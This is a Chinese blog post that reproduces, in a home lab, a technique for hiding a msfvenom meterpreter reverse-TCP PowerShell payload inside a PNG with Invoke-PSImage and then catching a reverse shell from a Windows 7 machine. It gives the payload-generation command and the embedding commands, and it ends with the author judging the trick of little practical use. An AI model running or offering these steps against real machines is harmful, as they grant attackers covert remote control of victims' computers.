关于某公众号自拍反弹shell的一个复现

该文章原文已在原公众号删除,未知原因,可能被喷太多。。。。。

前天刚看到这篇文章的时候真的是觉得这个要是真的那简直不要太爽好吧,一路复现过来,却发现实在是有些鸡肋了

好吧,接下来,复现过程

攻击机: 192.168.10.139 kali 靶机: 192.168.10.129 windows7 x64

首先需要一个脚本,原文提供的位置是:

https://github.com/peewpw/Invoke-PSImage

下载好脚本之后,先用msfvenom生成一个ps1后缀的脚本,也就是powershell执行文件,使用命令:

msfvenom -p windows/x64/meterpre/reverse_tcp lhost=监听ip lport=监听端口 -f psh-reflection > 1.ps1

生成之后,将该文件放于Invoke-PSInage文件目录下

接下来,在windows下打开powershell

<!-- wp:paragraph -->
<p>先执行命令 : Import-Module .\Invoke-PSImage.ps1 </p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p> 再执行“Invoke-PSImage -Script .\1.ps1 -Image .\1.jpg -Out .\3.png“命令进行两者合并。 </p>
<!-- /wp:paragraph -->

在kali上设置监听

在powershell上执行生成3.png时显示的代码,成功反弹

虽然成功复现,但是失望还是特别失望的,因为在实际的渗透过程中这个基本没什么卵用,这个脚本应该是属于图片隐写的一种

参考链接:https://www.4hou.com/technology/9472.html

点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Loading...